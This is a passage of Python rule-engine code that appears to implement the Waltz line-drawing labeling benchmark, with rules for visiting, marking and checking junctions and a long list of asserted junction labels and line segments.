c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n2),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_2j'))
def visit_2j_1(c):
visit_2j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '2j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point) & (m.label_name == c.l.n1),
none((m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_2j'))
def visit_2j_2(c):
visit_2j(c)
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now') & (m.j_t == '2j'),
c.l << (m.t == 'label') & (m.name == c.j.name),
none((m.t == 'edge_label') & (m.p1 == c.j.p1) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.p2) & (m.p2 == c.j.base_point)),
none((m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.lid == c.l.lid)),
(m.t == 'stage') & (m.l == 'visiting_2j'))
def visit_2j_3(c):
visit_2j(c)
@when_all(pri(1),
(m.t == 'junction') & (m.visited == 'now') & (m.j_t == '2j'),
c.stage << (m.t == 'stage') & (m.l == 'visiting_2j'))
def end_visit_2j(c):
c.retract_fact(c.stage)
c.assert_fact({'id': c.s.gid, 't': 'stage', 'l': 'marking'})
c.s.gid += 1
print('marking')
@when_all(c.j << (m.t == 'junction') & (m.visited == 'now'),
c.e << (m.t == 'edge') & (m.p2 == c.j.base_point),
c.junction << (m.t == 'junction') & (m.base_point == c.e.p1) & (m.visited == 'yes'),
(m.t == 'stage') & (m.l == 'marking'))
def marking(c):
c.retract_fact(c.junction); c.junction.id = c.s.gid; c.junction.visited = 'check'; c.assert_fact(c.junction)
c.s.gid += 1
@when_all(pri(1),
c.j << (m.t == 'junction') & (m.visited == 'now'),
(m.t == 'stage') & (m.l == 'marking'))
def stop_marking(c):
c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'yes'; c.assert_fact(c.j)
c.s.gid += 1
@when_all(pri(2),
c.stage << (m.t == 'stage') & (m.l == 'marking'))
def start_checking(c):
c.retract_fact(c.stage)
c.assert_fact({'id': c.s.gid, 't': 'stage', 'l': 'checking'})
c.s.gid += 1
print('checking')
@when_all(c.junction << (m.t == 'junction') & (m.visited == 'check'),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.junction.base_point),
c.j << (m.t == 'junction') & (m.base_point == c.el1.p2) & (m.visited == 'yes'),
none((m.t == 'edge_label') & (m.p1 == c.el1.p2) & (m.p2 == c.junction.base_point) & (m.label_name == c.el1.label_name)),
c.stage << (m.t == 'stage') & (m.l == 'checking'))
def checking(c):
print('remove_label')
c.retract_fact(c.stage)
c.assert_fact({'id': c.s.gid, 't': 'illegal', 'base_point': c.junction.base_point, 'lid': c.el1.lid})
c.post({'id': c.s.gid + 1, 't': 'stage', 'l': 'remove_label'})
c.s.gid += 2
@when_all(pri(1),
c.j << (m.t == 'junction') & (m.visited == 'check'),
(m.t == 'stage') & (m.l == 'checking'))
def checking2(c):
c.retract_fact(c.j); c.j.id = c.s.gid; c.j.visited = 'yes'; c.assert_fact(c.j)
c.s.gid += 1
@when_all(pri(2),
c.stage << (m.t == 'stage') & (m.l == 'checking'))
def stop_checking(c):
c.retract_fact(c.stage)
c.post({'id': c.s.gid, 't': 'stage', 'l': 'labeling'})
c.s.gid += 1
print('labeling')
@when_all(c.i << (m.t == 'illegal'),
c.j << (m.t == 'junction') & (m.j_t == '3j') & (m.base_point == c.i.base_point),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p1) & (m.lid == c.i.lid),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p2) & (m.lid == c.i.lid),
c.el3 << (m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p3) & (m.lid == c.i.lid),
(m.t == 'stage') & (m.l == 'remove_label'))
def remove_label_3j(c):
print('checking')
c.retract_fact(c.i)
c.retract_fact(c.el1)
c.retract_fact(c.el2)
c.retract_fact(c.el3)
c.assert_fact({'id': c.s.gid, 't': 'stage', 'l': 'checking'})
c.s.gid += 1
@when_all(c.i << (m.t == 'illegal'),
c.j << (m.t == 'junction') & (m.j_t == '2j') & (m.base_point == c.i.base_point),
c.el1 << (m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p1) & (m.lid == c.i.lid),
c.el2 << (m.t == 'edge_label') & (m.p1 == c.j.base_point) & (m.p2 == c.j.p2) & (m.lid == c.i.lid),
(m.t == 'stage') & (m.l == 'remove_label'))
def remove_edge_2j(c):
print('checking')
c.retract_fact(c.i)
c.retract_fact(c.el1)
c.retract_fact(c.el2)
c.assert_fact({'id': c.s.gid, 't': 'stage', 'l': 'checking'})
c.s.gid += 1
@when_start
def start(host):
create_and_assert(host, {'t':'label' ,'j_t':'2j' ,'name':'L' ,'lid':'1' ,'n1':'B' ,'n2':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'2j' ,'name':'L' ,'lid':'2' ,'n1':'+' ,'n2':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'2j' ,'name':'L' ,'lid':'3' ,'n1':'B' ,'n2':'+'})
create_and_assert(host, {'t':'label' ,'j_t':'2j' ,'name':'L' ,'lid':'4' ,'n1':'-' ,'n2':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'2j' ,'name':'L' ,'lid':'5' ,'n1':'B' ,'n2':'-'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'fork' ,'lid':'6' ,'n1':'+' ,'n2':'+' ,'n3':'+'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'fork' ,'lid':'7' ,'n1':'-' ,'n2':'-' ,'n3':'-'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'fork' ,'lid':'8' ,'n1':'B' ,'n2':'-' ,'n3':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'fork' ,'lid':'9' ,'n1':'-' ,'n2':'B' ,'n3':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'fork' ,'lid':'10' ,'n1':'B' ,'n2':'B' ,'n3':'-'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'tee' ,'lid':'11' ,'n1':'B' ,'n2':'+' ,'n3':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'tee' ,'lid':'12' ,'n1':'B' ,'n2':'-' ,'n3':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'tee' ,'lid':'13' ,'n1':'B' ,'n2':'B' ,'n3':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'arrow' ,'lid':'14' ,'n1':'B' ,'n2':'+' ,'n3':'B'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'arrow' ,'lid':'15' ,'n1':'-' ,'n2':'+' ,'n3':'-'})
create_and_assert(host, {'t':'label' ,'j_t':'3j' ,'name':'arrow' ,'lid':'16' ,'n1':'+' ,'n2':'-' ,'n3':'+'})
create_and_post(host, {'t':'line' ,'p1':50003 ,'p2':60003})
create_and_post(host, {'t':'line' ,'p1':30005 ,'p2':30006})
create_and_post(host, {'t':'line' ,'p1':80005 ,'p2':80006})
create_and_post(host, {'t':'line' ,'p1':50008 ,'p2':60008})
create_and_post(host, {'t':'line' ,'p1':0 ,'p2':20000})
create_and_post(host, {'t':'line' ,'p1':20000 ,'p2':30000})
create_and_post(host, {'t':'line' ,'p1':30000 ,'p2':40000})
create_and_post(host, {'t':'line' ,'p1':0 ,'p2':2})
create_and_post(host, {'t':'line' ,'p1':2 ,'p2':3})
create_and_post(host, {'t':'line' ,'p1':3 ,'p2':4})
create_and_post(host, {'t':'line' ,'p1':4 ,'p2':40004})
create_and_post(host, {'t':'line' ,'p1':40004 ,'p2':40000})
create_and_post(host, {'t':'line' ,'p1':40000 ,'p2':50001})
create_and_post(host, {'t':'line' ,'p1':50001 ,'p2':50002})
create_and_post(host, {'t':'line' ,'p1':50002 ,'p2':50003})
create_and_post(host, {'t':'line' ,'p1':50003 ,'p2':50005})
create_and_post(host, {'t':'line' ,'p1':50005 ,'p2':40004})
create_and_post(host, {'t':'line' ,'p1':50005 ,'p2':30005})
create_and_post(host, {'t':'line' ,'p1':30005 ,'p2':20005})
create_and_post(host, {'t':'line' ,'p1':20005 ,'p2':10005})
create_and_post(host, {'t':'line' ,'p1':10005 ,'p2':4})
create_and_post(host, {'t':'line' ,'p1':60000 ,'p2':80000})
create_and_post(host, {'t':'line' ,'p1':80000 ,'p2':90000})
create_and_post(host, {'t':'line' ,'p1':90000 ,'p2':100000})
create_and_post(host, {'t':'line' ,'p1':60000 ,'p2':60002})
create_and_post(host, {'t':'line' ,'p1':60002 ,'p2':60003})
create_and_post(host, {'t':'line' ,'p1':60003 ,'p2':60004})
create_and_post(host, {'t':'line' ,'p1':60004 ,'p2':100004})
create_and_post(host, {'t':'line' ,'p1':100004 ,'p2':100000})
create_and_post(host, {'t':'line' ,'p1':100000 ,'p2':110001})
create_and_post(host, {'t':'line' ,'p1':110001 ,'p2':110002})
create_and_post(host, {'t':'line' ,'p1':110002 ,'p2':110003})
create_and_post(host, {'t':'line' ,'p1':110003 ,'p2':110005})
create_and_post(host, {'t':'line' ,'p1':110005 ,'p2':100004})
create_and_post(host, {'t':'line' ,'p1':110005 ,'p2':90005})
create_and_post(host, {'t':'line' ,'p1':90005 ,'p2':80005})
create_and_post(host, {'t':'line' ,'p1':80005 ,'p2':70005})
create_and_post(host, {'t':'line' ,'p1':70005 ,'p2':60004})
create_and_post(host, {'t':'line' ,'p1':6 ,'p2':20006})
create_and_post(host, {'t':'line' ,'p1':20006 ,'p2':30006})
create_and_post(host, {'t':'line' ,'p1':30006 ,'p2':40006})
create_and_post(host, {'t':'line' ,'p1':6 ,'p2':8})
create_and_post(host, {'t':'line' ,'p1':8 ,'p2':9})
create_and_post(host, {'t':'line' ,'p1':9 ,'p2':10})
create_and_post(host, {'t':'line' ,'p1':10 ,'p2':40010})
create_and_post(host, {'t':'line' ,'p1':40010 ,'p2':40006})
create_and_post(host, {'t':'line' ,'p1':40006 ,'p2':50007})
create_and_post(host, {'t':'line' ,'p1':50007 ,'p2':50008})
create_and_post(host, {'t':'line' ,'p1':50008 ,'p2':50009})
create_and_post(host, {'t':'line' ,'p1':50009 ,'p2':50011})
create_and_post(host, {'t':'line' ,'p1':50011 ,'p2':40010})
create_and_post(host, {'t':'line' ,'p1':50011 ,'p2':30011})
create_and_post(host, {'t':'line' ,'p1':30011 ,'p2':20011})
create_and_post(host, {'t':'line' ,'p1':20011 ,'p2':10011})
create_and_post(host, {'t':'line' ,'p1':10011 ,'p2':10})
create_and_post(host, {'t':'line' ,'p1':60006 ,'p2':80006})
create_and_post(host, {'t':'line' ,'p1':80006 ,'p2':90006})
create_and_post(host, {'t':'line' ,'p1':90006 ,'p2':100006})
create_and_post(host, {'t':'line' ,'p1':60006 ,'p2':60008})
create_and_post(host, {'t':'line' ,'p1':60008 ,'p2':60009})
create_and_post(host, {'t':'line' ,'p1':60009 ,'p2':60010})
create_and_post(host, {'t':'line' ,'p1':60010 ,'p2':100010})
create_and_post(host, {'t':'line' ,'p1':100010 ,'p2':100006})
create_and_post(host, {'t':'line' ,'p1':100006 ,'p2':110007})
create_and_post(host, {'t':'line' ,'p1':110007 ,'p2':110008})
create_and_post(host, {'t':'line' ,'p1':110008 ,'p2':110009})
create_and_post(host, {'t':'line' ,'p1':110009 ,'p2':110011})
create_and_post(host, {'t':'line' ,'p1':110011 ,'p2':100010})
create_and_post(host, {'t':'line' ,'p1':110011 ,'p2':90011})
create_and_post(host, {'t':'line' ,'p1':90011 ,'p2':80011})
create_and_post(host, {'t':'line' ,'p1':80011 ,'p2':70011})
create_and_post(host, {'t':'line' ,'p1':70011 ,'p2':60010})
create_and_post(host, {'t':'line' ,'p1':170003 ,'p2':180003})
create_and_post(host, {'t':'line' ,'p1':150005 ,'p2':150006})
create_and_post(host, {'t':'line' ,'p1':200005 ,'p2':200006})
create_and_post(host, {'t':'line' ,'p1':170008 ,'p2':180008})
create_and_post(host, {'t':'line' ,'p1':120000 ,'p2':140000})
create_and_post(host, {'t':'line' ,'p1':140000 ,'p2':150000})
create_and_post(host, {'t':'line' ,'p1':150000 ,'p2':160000})
create_and_post(host, {'t':'line' ,'p1':120000 ,'p2':120002})
create_and_post(host, {'t':'line' ,'p1':120002 ,'p2':120003})
create_and_post(host, {'t':'line' ,'p1':120003 ,'p2':120004})
create_and_post(host, {'t':'line' ,'p1':120004 ,'p2':160004})
create_and_post(host, {'t':'line' ,'p1':160004 ,'p2':160000})
create_and_post(host, {'t':'line' ,'p1':160000 ,'p2':170001})
create_and_post(host, {'t':'line' ,'p1':170001 ,'p2':170002})
create_and_post(host, {'t':'line' ,'p1':170002 ,'p2':170003})
create_and_post(host, {'t':'line' ,'p1':170003 ,'p2':170005})
create_and_post(host, {'t':'line' ,'p1':170005 ,'p2':160004})
create_and_post(host, {'t':'line' ,'p1':170005 ,'p2':150005})
create_and_post(host, {'t':'line' ,'p1':150005 ,'p2':140005})
create_and_post(host, {'t':'line' ,'p1':140005 ,'p2':130005})
create_and_post(host, {'t':'line' ,'p1':130005 ,'p2':120004})
create_and_post(host, {'t':'line' ,'p1':180000 ,'p2':200000})
create_and_post(host, {'t':'line' ,'p1':200000 ,'p2':210000})
create_and_post(host, {'t':'line' ,'p1':210000 ,'p2':220000})
create_and_post(host, {'t':'line' ,'p1':180000 ,'p2':180002})
create_and_post(host, {'t':'line' ,'p1':180002 ,'p2':180003})
create_and_post(host, {'t':'line' ,'p1':180003 ,'p2':180004})
create_and_post(host, {'t':'line' ,'p1':180004 ,'p2':220004})
create_and_post(host, {'t':'line' ,'p1':220004 ,'p2':220000})
create_and_post(host, {'t':'line' ,'p1':220000 ,'p2':230001})
create_and_post(host, {'t':'line' ,'p1':230001 ,'p2':230002})
create_and_post(host, {'t':'line' ,'p1':230002 ,'p2':230003})
create_and_post(host, {'t':'line' ,'p1':230003 ,'p2':230005})
create_and_post(host, {'t':'line' ,'p1':230005 ,'p2':220004})
create_and_post(host, {'t':'line' ,'p1':230005 ,'p2':210005})
create_and_post(host, {'t':'line' ,'p1':210005 ,'p2':200005})
create_and_post(host, {'t':'line' ,'p1':200005 ,'p2':190005})
create_and_post(host, {'t':'line' ,'p1':190005 ,'p2':180004})
create_and_post(host, {'t':'line' ,'p1':120006 ,'p2':140006})
create_and_post(host, {'t':'line' ,'p1':140006 ,'p2':150006})
create_and_post(host, {'t':'line' ,'p1':150006 ,'p2':160006})
create_and_post(host, {'t':'line' ,'p1':120006 ,'p2':120008})
create_and_post(host, {'t':'line' ,'p1':120008 ,'p2':120009})
create_and_post(host, {'t':'line' ,'p1':120009 ,'p2':120010})
create_and_post(host, {'t':'line' ,'p1':120010 ,'p2':160010})
create_and_post(host, {'t':'line' ,'p1':160010 ,'p2':160006})
create_and_post(host, {'t':'line' ,'p1':160006 ,'p2':170007})
create_and_post(host, {'t':'line' ,'p1':170007 ,'p2':170008})
create_and_post(host, {'t':'line' ,'p1':170008 ,'p2':170009})
create_and_post(host, {'t':'line' ,'p1':170009 ,'p2':170011})
create_and_post(host, {'t':'line' ,'p1':170011 ,'p2':160010})
create_and_post(host, {'t':'line' ,'p1':170011 ,'p2':150011})
create_and_post(host, {'t':'line' ,'p1':150011 ,'p2':140011})
create_and_post(host, {'t':'line' ,'p1':140011 ,'p2':130011})
create_and_post(host, {'t':'line' ,'p1':130011 ,'p2':120010})
create_and_post(host, {'t':'line' ,'p1':180006 ,'p2':200006})
create_and_post(host, {'t':'line' ,'p1':200006 ,'p2':210006})
create_and_post(host, {'t':'line' ,'p1':210006 ,'p2':220006})
create_and_post(host, {'t':'line' ,'p1':180006 ,'p2':180008})
create_and_post(host, {'t':'line' ,'p1':180008 ,'p2':180009})
create_and_post(host, {'t':'line' ,'p1':180009 ,'p2':180010})
create_and_post(host, {'t':'line' ,'p1':180010 ,'p2':220010})
create_and_post(host, {'t':'line' ,'p1':220010 ,'p2':220006})
create_and_post(host, {'t':'line' ,'p1':220006 ,'p2':230007})
create_and_post(host, {'t':'line' ,'p1':230007 ,'p2':230008})
create_and_post(host, {'t':'line' ,'p1':230008 ,'p2':230009})
create_and_post(host, {'t':'line' ,'p1':230009 ,'p2':230011})
create_and_post(host, {'t':'line' ,'p1':230011 ,'p2':220010})
create_and_post(host, {'t':'line' ,'p1':230011 ,'p2':210011})
create_and_post(host, {'t':'line' ,'p1':210011 ,'p2':200011})
create_and_post(host, {'t':'line' ,'p1':200011 ,'p2':190011})
create_and_post(host, {'t':'line' ,'p1':190011 ,'p2':180010})
create_and_post(host, {'t':'line' ,'p1':110003 ,'p2':120003})
create_and_post(host, {'t':'line' ,'p1':90005 ,'p2':90006})
create_and_post(host, {'t':'line' ,'p1':140005 ,'p2':140006})
create_and_post(host, {'t':'line' ,'p1':110008 ,'p2':120008})
create_and_post(host, {'t':'line' ,'p1':290003 ,'p2':300003})
create_and_post(host, {'t':'line' ,'p1':270005 ,'p2':270006})
create_and_post(host, {'t':'line' ,'p1':320005 ,'p2':320006})
create_and_post(host, {'t':'line' ,'p1':290008 ,'p2':300008})
create_and_post(host, {'t':'line' ,'p1':240000 ,'p2':260000})
create_and_post(host, {'t':'line' ,'p1':260000 ,'p2':270000})
create_and_post(host, {'t':'line' ,'p1':270000 ,'p2':280000})
create_and_post(host, {'t':'line' ,'p1':240000 ,'p2':240002})
create_and_post(host, {'t':'line' ,'p1':240002 ,'p2':240003})
create_and_post(host, {'t':'line' ,'p1':240003 ,'p2':240004})
create_and_post(host, {'t':'line' ,'p1':240004 ,'p2':280004})
create_and_post(host, {'t':'line' ,'p1':280004 ,'p2':280000})
create_and_post(host, {'t':'line' ,'p1':280000 ,'p2':290001})
create_and_post(host, {'t':'line' ,'p1':290001 ,'p2':290002})
create_and_post(host, {'t':'line' ,'p1':290002 ,'p2':290003})
create_and_post(host, {'t':'line' ,'p1':290003 ,'p2':290005})
create_and_post(host, {'t':'line' ,'p1':290005 ,'p2':280004})
create_and_post(host, {'t':'line' ,'p1':290005 ,'p2':270005})
create_and_post(host, {'t':'line' ,'p1':270005 ,'p2':260005})
create_and_post(host, {'t':'line' ,'p1':260005 ,'p2':250005})
create_and_post(host, {'t':'line' ,'p1':250005 ,'p2':240004})
create_and_post(host, {'t':'line' ,'p1':300000 ,'p2':320000})
create_and_post(host, {'t':'line' ,'p1':320000 ,'p2':330000})
create_and_post(host, {'t':'line' ,'p1':330000 ,'p2':340000})
create_and_post(host, {'t':'line' ,'p1':300000 ,'p2':300002})
create_and_post(host, {'t':'line' ,'p1':300002 ,'p2':300003})
create_and_post(host, {'t':'line' ,'p1':300003 ,'p2':300004})
create_and_post(host, {'t':'line' ,'p1':300004 ,'p2':340004})
create_and_post(host, {'t':'line' ,'p1':340004 ,'p2':340000})
create_and_post(host, {'t':'line' ,'p1':340000 ,'p2':350001})
create_and_post(host, {'t':'line' ,'p1':350001 ,'p2':350002})
create_and_post(host, {'t':'line' ,'p1':350002 ,'p2':350003})
create_and_post(host, {'t':'line' ,'p1':350003 ,'p2':350005})
create_and_post(host, {'t':'line' ,'p1':350005 ,'p2':340004})
create_and_post(host, {'t':'line' ,'p1':350005 ,'p2':330005})
create_and_post(host, {'t':'line' ,'p1':330005 ,'p2':320005})
create_and_post(host, {'t':'line' ,'p1':320005 ,'p2':310005})
create_and_post(host, {'t':'line' ,'p1':310005 ,'p2':300004})
create_and_post(host, {'t':'line' ,'p1':240006 ,'p2':260006})
create_and_post(host, {'t':'line' ,'p1':260006 ,'p2':270006})
create_and_post(host, {'t':'line' ,'p1':270006 ,'p2':280006})
create_and_post(host, {'t':'line' ,'p1':240006 ,'p2':240008})
create_and_post(host, {'t':'line' ,'p1':240008 ,'p2':240009})
create_and_post(host, {'t':'line' ,'p1':240009 ,'p2':240010})
create_and_post(host, {'t':'line' ,'p1':240010 ,'p2':280010})
create_and_post(host, {'t':'line' ,'p1':280010 ,'p2':280006})
create_and_post(host, {'t':'line' ,'p1':280006 ,'p2':290007})
create_and_post(host, {'t':'line' ,'p1':290007 ,'p2':290008})
create_and_post(host, {'t':'line' ,'p1':290008 ,'p2':290009})
create_and_post(host, {'t':'line' ,'p1':290009 ,'p2':290011})
create_and_post(host, {'t':'line' ,'p1':290011 ,'p2':280010})
create_and_post(host, {'t':'line' ,'p1':290011 ,'p2':270011})
create_and_post(host, {'t':'line' ,'p1':270011 ,'p2':260011})
create_and_post(host, {'t':'line' ,'p1':260011 ,'p2':250011})
create_and_post(host, {'t':'line' ,'p1':250011 ,'p2':240010})
create_and_post(host, {'t':'line' ,'p1':300006 ,'p2':320006})
create_and_post(host, {'t':'line' ,'p1':320006 ,'p2':330006})
create_and_post(host, {'t':'line' ,'p1':330006 ,'p2':340006})
create_and_post(host, {'t':'line' ,'p1':300006 ,'p2':300008})
create_and_post(host, {'t':'line' ,'p1':300008 ,'p2':300009})
create_and_post(host, {'t':'line' ,'p1':300009 ,'p2':300010})
create_and_post(host, {'t':'line' ,'p1':300010 ,'p2':340010})
create_and_post(host, {'t':'line' ,'p1':340010 ,'p2':340006})
create_and_post(host, {'t':'line' ,'p1':340006 ,'p2':350007})
create_and_post(host, {'t':'line' ,'p1':350007 ,'p2':350008})
create_and_post(host, {'t':'line' ,'p1':350008 ,'p2':350009})
create_and_post(host, {'t':'line' ,'p1':350009 ,'p2':350011})
create_and_post(host, {'t':'line' ,'p1':350011 ,'p2':340010})
create_and_post(host, {'t':'line' ,'p1':350011 ,'p2':330011})
create_and_post(host, {'t':'line' ,'p1':330011 ,'p2':320011})
create_and_post(host, {'t':'line' ,'p1':320011 ,'p2':310011})
create_and_post(host, {'t':'line' ,'p1':310011 ,'p2':300010})
create_and_post(host, {'t':'line' ,'p1':230003 ,'p2':240003})
create_and_post(host, {'t':'line' ,'p1':210005 ,'p2':210006})
create_and_post(host, {'t':'line' ,'p1':260005 ,'p2':260006})
create_and_post(host, {'t':'line' ,'p1':230008 ,'p2':240008})
create_and_post(host, {'t':'line' ,'p1':410003 ,'p2':420003})
create_and_post(host, {'t':'line' ,'p1':390005 ,'p2':390006})
create_and_post(host, {'t':'line' ,'p1':440005 ,'p2':440006})
create_and_post(host, {'t':'line' ,'p1':410008 ,'p2':420008})
create_and_post(host, {'t':'line' ,'p1':360000 ,'p2':380000})
create_and_post(host, {'t':'line' ,'p1':380000 ,'p2':390000})
create_and_post(host, {'t':'line' ,'p1':390000 ,'p2':400000})
create_and_post(host, {'t':'line' ,'p1':360000 ,'p2':360002})
create_and_post(host, {'t':'line' ,'p1':360002 ,'p2':360003})
create_and_post(host, {'t':'line' ,'p1':360003 ,'p2':360004})
create_and_post(host, {'t':'line' ,'p1':360004 ,'p2':400004})
create_and_post(host, {'t':'line' ,'p1':400004 ,'p2':400000})
create_and_post(host, {'t':'line' ,'p1':400000 ,'p2':410001})
create_and_post(host, {'t':'line' ,'p1':410001 ,'p2':410002})
create_and_post(host, {'t':'line' ,'p1':410002 ,'p2':410003})
create_and_post(host, {'t':'line' ,'p1':410003 ,'p2':410005})
create_and_post(host, {'t':'line' ,'p1':410005 ,'p2':400004})
create_and_post(host, {'t':'line' ,'p1':410005 ,'p2':390005})
create_and_post(host, {'t':'line' ,'p1':390005 ,'p2':380005})
create_and_post(host, {'t':'line' ,'p1':380005 ,'p2':370005})
create_and_post(host, {'t':'line' ,'p1':370005 ,'p2':360004})
create_and_post(host, {'t':'line' ,'p1':420000 ,'p2':440000})
create_and_post(host, {'t':'line' ,'p1':440000 ,'p2':450000})
create_and_post(host, {'t':'line' ,'p1':450000 ,'p2':460000})
create_and_post(host, {'t':'line' ,'p1':420000 ,'p2':420002})
create_and_post(host, {'t':'line' ,'p1':420002 ,'p2':420003})
create_and_post(host, {'t':'line' ,'p1':420003 ,'p2':420004})
create_and_post(host, {'t':'line' ,'p1':420004 ,'p2':460004})
create_and_post(host, {'t':'line' ,'p1':460004 ,'p2':460000})
create_and_post(host, {'t':'line' ,'p1':460000 ,'p2':470001})
create_and_post(host, {'t':'line' ,'p1':470001 ,'p2':470002})
create_and_post(host, {'t':'line' ,'p1':470002 ,'p2':470003})
create_and_post(host, {'t':'line' ,'p1':470003 ,'p2':470005})
create_and_post(host, {'t':'line' ,'p1':470005 ,'p2':460004})
create_and_post(host, {'t':'line' ,'p1':470005 ,'p2':450005})
create_and_post(host, {'t':'line' ,'p1':450005 ,'p2':440005})
create_and_post(host, {'t':'line' ,'p1':440005 ,'p2':430005})
create_and_post(host, {'t':'line' ,'p1':430005 ,'p2':420004})
create_and_post(host, {'t':'line' ,'p1':360006 ,'p2':380006})
create_and_post(host, {'t':'line' ,'p1':380006 ,'p2':390006})
create_and_post(host, {'t':'line' ,'p1':390006 ,'p2':400006})
create_and_post(host, {'t':'line' ,'p1':360006 ,'p2':360008})
create_and_post(host, {'t':'line' ,'p1':360008 ,'p2':360009})
create_and_post(host, {'t':'line' ,'p1':360009 ,'p2':360010})
create_and_post(host, {'t':'line' ,'p1':360010 ,'p2':400010})
create_and_post(host, {'t':'line' ,'p1':400010 ,'p2':400006})
create_and_post(host, {'t':'line' ,'p1':400006 ,'p2':410007})
create_and_post(host, {'t':'line' ,'p1':410007 ,'p2':410008})
create_and_post(host, {'t':'line' ,'p1':410008 ,'p2':410009})
create_and_post(host, {'t':'line' ,'p1':410009 ,'p2':410011})
create_and_post(host, {'t':'line' ,'p1':410011 ,'p2':400010})
create_and_post(host, {'t':'line' ,'p1':410011 ,'p2':390011})
create_and_post(host, {'t':'line' ,'p1':390011 ,'p2':380011})
create_and_post(host, {'t':'line' ,'p1':380011 ,'p2':370011})
create_and_post(host, {'t':'line' ,'p1':370011 ,'p2':360010})
create_and_post(host, {'t':'line' ,'p1':420006 ,'p2':440006})
create_and_post(host, {'t':'line' ,'p1':440006 ,'p2':450006})
create_and_post(host, {'t':'line' ,'p1':450006 ,'p2':460006})
create_and_post(host, {'t':'line' ,'p1':420006 ,'p2':420008})
create_and_post(host, {'t':'line' ,'p1':420008 ,'p2':420009})
create_and_post(host, {'t':'line' ,'p1':420009 ,'p2':420010})
create_and_post(host, {'t':'line' ,'p1':420010 ,'p2':460010})
create_and_post(host, {'t':'line' ,'p1':460010 ,'p2':460006})
create_and_post(host, {'t':'line' ,'p1':460006 ,'p2':470007})
create_and_post(host, {'t':'line' ,'p1':470007 ,'p2':470008})
create_and_post(host, {'t':'line' ,'p1':470008 ,'p2':470009})
create_and_post(host, {'t':'line' ,'p1':470009 ,'p2':470011})
create_and_post(host, {'t':'line' ,'p1':470011 ,'p2':460010})
create_and_post(host, {'t':'line' ,'p1':470011 ,'p2':450011})
create_and_post(host, {'t':'line' ,'p1':450011 ,'p2':440011})
create_and_post(host, {'t':'line' ,'p1':440011 ,'p2':430011})
create_and_post(host, {'t':'line' ,'p1':430011 ,'p2':420010})
create_and_post(host, {'t':'line' ,'p1':350003 ,'p2':360003})
create_and_post(host, {'t':'line' ,'p1':330005 ,'p2':330006})
create_and_post(host, {'t':'line' ,'p1':380005 ,'p2':380006})
create_and_post(host, {'t':'line' ,'p1':350008 ,'p2':360008})
create_and_post(host, {'t':'line' ,'p1':530003 ,'p2':540003})
create_and_post(host, {'t':'line' ,'p1':510005 ,'p2':510006})
create_and_post(host, {'t':'line' ,'p1':560005 ,'p2':560006})
create_and_post(host, {'t':'line' ,'p1':530008 ,'p2':540008})
create_and_post(host, {'t':'line' ,'p1':480000 ,'p2':500000})
create_and_post(host, {'t':'line' ,'p1':500000 ,'p2':510000})
create_and_post(host, {'t':'line' ,'p1':510000 ,'p2':520000})
create_and_post(host, {'t':'line' ,'p1':480000 ,'p2':480002})
create_and_post(host, {'t':'line' ,'p1':480002 ,'p2':480003})
create_and_post(host, {'t':'line' ,'p1':480003 ,'p2':480004})
create_and_post(host, {'t':'line' ,'p1':480004 ,'p2':520004})
create_and_post(host, {'t':'line' ,'p1':520004 ,'p2':520000})
create_and_post(host, {'t':'line' ,'p1':520000 ,'p2':530001})
create_and_post(host, {'t':'line' ,'p1':530001 ,'p2':530002})
create_and_post(host, {'t':'line' ,'p1':530002 ,'p2':530003})
create_and_post(host, {'t':'line' ,'p1':530003 ,'p2':530005})
create_and_post(host, {'t':'line' ,'p1':530005 ,'p2':520004})
create_and_post(host, {'t':'line' ,'p1':530005 ,'p2':510005})
create_and_post(host, {'t':'line' ,'p1':510005 ,'p2':500005})
create_and_post(host, {'t':'line' ,'p1':500005 ,'p2':490005})
create_and_post(host, {'t':'line' ,'p1':490005 ,'p2':480004})
create_and_post(host, {'t':'line' ,'p1':540000 ,'p2':560000})
create_and_post(host, {'t':'line' ,'p1':560000 ,'p2':570000})
create_and_post(host, {'t':'line' ,'p1':570000 ,'p2':580000})
create_and_post(host, {'t':'line' ,'p1':540000 ,'p2':540002})
create_and_post(host, {'t':'line' ,'p1':540002 ,'p2':540003})
create_and_post(host, {'t':'line' ,'p1':540003 ,'p2':540004})
create_and_post(host, {'t':'line' ,'p1':540004 ,'p2':580004})
create_and_post(host, {'t':'line' ,'p1':580004 ,'p2':580000})
create_and_post(host, {'t':'line' ,'p1':580000 ,'p2':590001})
create_and_post(host, {'t':'line' ,'p1':590001 ,'p2':590002})
